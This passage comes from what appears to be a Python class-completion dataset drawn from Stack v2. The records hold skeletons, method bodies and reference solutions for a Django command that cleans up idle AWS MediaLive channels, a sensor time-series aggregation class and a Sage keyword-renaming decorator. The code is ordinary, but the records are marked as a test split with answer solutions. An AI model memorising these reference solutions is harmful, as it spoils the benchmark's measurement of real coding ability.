started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n <|body_0|>\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n<|end_body_0|>\n\n<|body_start_1|>\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n<|end_body_1|>\n", "revision_id": "f767f1bdc12c9712f26ea17cb8b19f536389f0ed", "skeleton": "<|skeleton|>\nclass Command:\n \"\"\"Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n <|body_0|>\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Command:\n \"\"\"Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n", "source": "the_stack_v2_python_sparse", "source_path": "src/backend/marsha/core/management/commands/clean_aws_elemental_stack.py", "source_repo": "openfun/marsha", "split": "test", "star_events_count": 92} {"blob_id": "61a4ee57be4727ef84cd7310f388a3debd1b5566", "bodies": ["from .timeseriesdata import TimeSeriesData\ntry:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\nexcept TimeSeriesData.DoesNotExist:\n return {}\nreturn data", "from .timeseriesdata import TimeSeriesData\nraw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\nif not raw:\n raise TimeSeriesData.DoesNotExist\nexpected_samples = (data_end - data_start).total_seconds() / self.resolution\nif resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\nelse:\n aggregation_factor = int(resolution // self.resolution)\nlogger.debug('%s objects to aggregate', len(raw))\naggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\nlogger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\ndata = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\nreturn data", "if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\nfrom .timeseriesdata import TimeSeriesData\nif resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\nelse:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\nreturn data", "from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\nif not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\nelif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\ndata = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\nlogger.debug('to archive: %s', data)\narchived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\narchived.save()\nlogger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\nif delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\nreturn archived"], "bodies_text": "<|body_start_0|>\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n<|end_body_3|>\n", "class_docstring": "A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor", "class_name": "DeviceSensor", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n <|body_0|>\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n <|body_1|>\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n <|body_2|>\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000416", "length_bytes": 8729, "license_type": "permissive", "methods": [{"docstring": "Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this", "name": "get_latest_ts_data", "signature": "def get_latest_ts_data(self)"}, {"docstring": "Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period", "name": "_get_aggregated_data", "signature": "def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type)"}, {"docstring": "Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.", "name": "optimised_data_fetch", "signature": "def optimised_data_fetch(self, data_start, data_end, resolution)"}, {"docstring": "Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu", "name": "archive_between", "signature": "def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004059", "prompt": "Implement the Python class `DeviceSensor` described below.\n\nClass description:\nA sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\n\nMethod signatures and docstrings:\n- def get_latest_ts_data(self): Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\n- def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type): Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\n- def optimised_data_fetch(self, data_start, data_end, resolution): Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\n- def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False): Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu", "prompted_full_text": "Implement the Python class `DeviceSensor` described below.\n\nClass description:\nA sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\n\nMethod signatures and docstrings:\n- def get_latest_ts_data(self): Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\n- def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type): Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\n- def optimised_data_fetch(self, data_start, data_end, resolution): Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\n- def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False): Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\n\n<|skeleton|>\nclass DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n <|body_0|>\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n <|body_1|>\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n <|body_2|>\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n<|end_body_3|>\n", "revision_id": "5c569f54f100e23d72e2ac4de795739ea461a431", "skeleton": "<|skeleton|>\nclass DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n <|body_0|>\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n <|body_1|>\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n <|body_2|>\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DeviceSensor:\n \"\"\"A sensor associated with a device Attributes: device (Device): associated device resolution (float): how often this is sampled, in seconds sensor_type (SensorType): type of sensor\"\"\"\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device The latest_ts_data_optimised on AbstractDevice should be used instead of directly calling this\"\"\"\n from .timeseriesdata import TimeSeriesData\n try:\n data = TimeSeriesData.objects.filter(sensor=self).latest('ts')\n except TimeSeriesData.DoesNotExist:\n return {}\n return data\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings of arguments. Raises: TimeSeriesData.DoesNotExist: If there is no data in the given period\"\"\"\n from .timeseriesdata import TimeSeriesData\n raw = TimeSeriesData.objects.filter(ts__gte=data_start, ts__lt=data_end, sensor=self).values_list('value', 'ts')\n if not raw:\n raise TimeSeriesData.DoesNotExist\n expected_samples = (data_end - data_start).total_seconds() / self.resolution\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n aggregation_factor = int(resolution // self.resolution)\n logger.debug('%s objects to aggregate', len(raw))\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n logger.debug(\"Aggregating '%s' with %s, factor %s\", aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE, aggregation_factor)\n data = aggregation_engine(raw, aggregation_type, aggregation_factor, expected_samples, data_start, data_end, self)\n return data\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it See Device.optimised_data_fetch for args This function assumes all the input data is already validated.\"\"\"\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError('Resolution should be a multiple of {} (was {})'.format(self.resolution, resolution))\n from .timeseriesdata import TimeSeriesData\n if resolution == self.resolution:\n data = TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end)\n else:\n data = self._get_aggregated_data(data_start, data_end, resolution, self.sensor_type.aggregation_type)\n return data\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates This does it like ``[data_start, data_end)`` - including start, not end If delete is True, also delete the old ts data. Args: data_start (datetime): start of archive data_end (datetime): end of archives Keyword args: delete (bool, optional): delete old ts data if True aggregation_type (str, optional): If this is passed then it will use that aggregation type rather than the 'default' on the sensor type. This has to be one of zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will raise an error. Note that some of these choices may be meaningless for certain data types (eg, sum of temperatures over a month is a bit useless) Retu\"\"\"\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n data = self._get_aggregated_data(data_start, data_end, AGGREGATE_TO_ONE_VALUE, aggregation_type)\n logger.debug('to archive: %s', data)\n archived = TimeSeriesDataArchive(start=data_start, end=data_end, value=data[0].value, sensor=self, aggregation_type=aggregation_type)\n archived.save()\n logger.debug('archived %s to %s with %s: %s', archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n if delete:\n TimeSeriesData.objects.filter(sensor=self, ts__gte=data_start, ts__lt=data_end).delete()\n return archived\n", "source": "the_stack_v2_python_sparse", "source_path": "zconnect/zc_timeseries/_models/sensor.py", "source_repo": "zconnect-iot/zconnect-django", "split": "test", "star_events_count": 2} {"blob_id": "4ead87beb7ecec27cfd6c6c437cdef82d156e013", "bodies": ["assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\nself.renames = renames\nself.deprecation = deprecation", "@sage_wraps(func)\ndef wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\nreturn wrapper"], "bodies_text": "<|body_start_0|>\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n<|end_body_0|>\n\n<|body_start_1|>\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n<|end_body_1|>\n", "class_docstring": "", "class_name": "rename_keyword", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass rename_keyword:\n\n def __init__(self, deprecated=None, deprecation=None, **renames):\n \"\"\"A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo\"\"\"\n <|body_0|>\n\n def __call__(self, func):\n \"\"\"Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(rgbcolor=1) () {'rgbcolor': 1} sage: f(color=1) () {'rgbcolor': 1} We can also deprecate the renamed keyword:: sage: r = rename_keyword(deprecation=13109, deprecated_option='new_option') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} sage: f(alpha=1) () {'alpha': 1} sage: f(new_option=1) () {'new_option': 1} sage: f(deprecated_option=1) doctest:...: DeprecationWarning: use the opt\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert deprecated is None, 'Use @rename_keyword(deprecation=, ...)'\n self.renames = renames\n self.deprecation = deprecation\n<|end_body_0|>\n\n<|body_start_1|>\n @sage_wraps(func)\n def wrapper(*args, **kwds):\n for old_name, new_name in self.renames.items():\n if old_name in kwds and new_name not in kwds:\n if self.deprecation is not None:\n from sage.misc.superseded import deprecation\n deprecation(self.deprecation, 'use the option %r instead of %r' % (new_name, old_name))\n kwds[new_name] = kwds[old_name]\n del kwds[old_name]\n return func(*args, **kwds)\n return wrapper\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000417", "length_bytes": 27285, "license_type": "no_license", "methods": [{"docstring": "A decorator which renames keyword arguments and optionally deprecates the new keyword. INPUT: - ``deprecation`` -- integer. The trac ticket number where the deprecation was introduced. - the rest of the arguments is a list of keyword arguments in the form ``renamed_option='existing_option'``. This will have the effect of renaming ``renamed_option`` so that the function only sees ``existing_option``. If both ``renamed_option`` and ``existing_option`` are passed to the function, ``existing_option`` will override the ``renamed_option`` value. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: r.renames {'color': 'rgbcolor'} sage: lo", "name": "__init__", "signature": "def __init__(self, deprecated=None, deprecation=None, **renames)"}, {"docstring": "Rename keywords. EXAMPLES:: sage: from sage.misc.decorators import rename_keyword sage: r = rename_keyword(color='rgbcolor') sage: def f(*args, **kwds): ....: print(\"{} {}\".format(args, kwds)) sage: f = r(f) sage: f() () {} 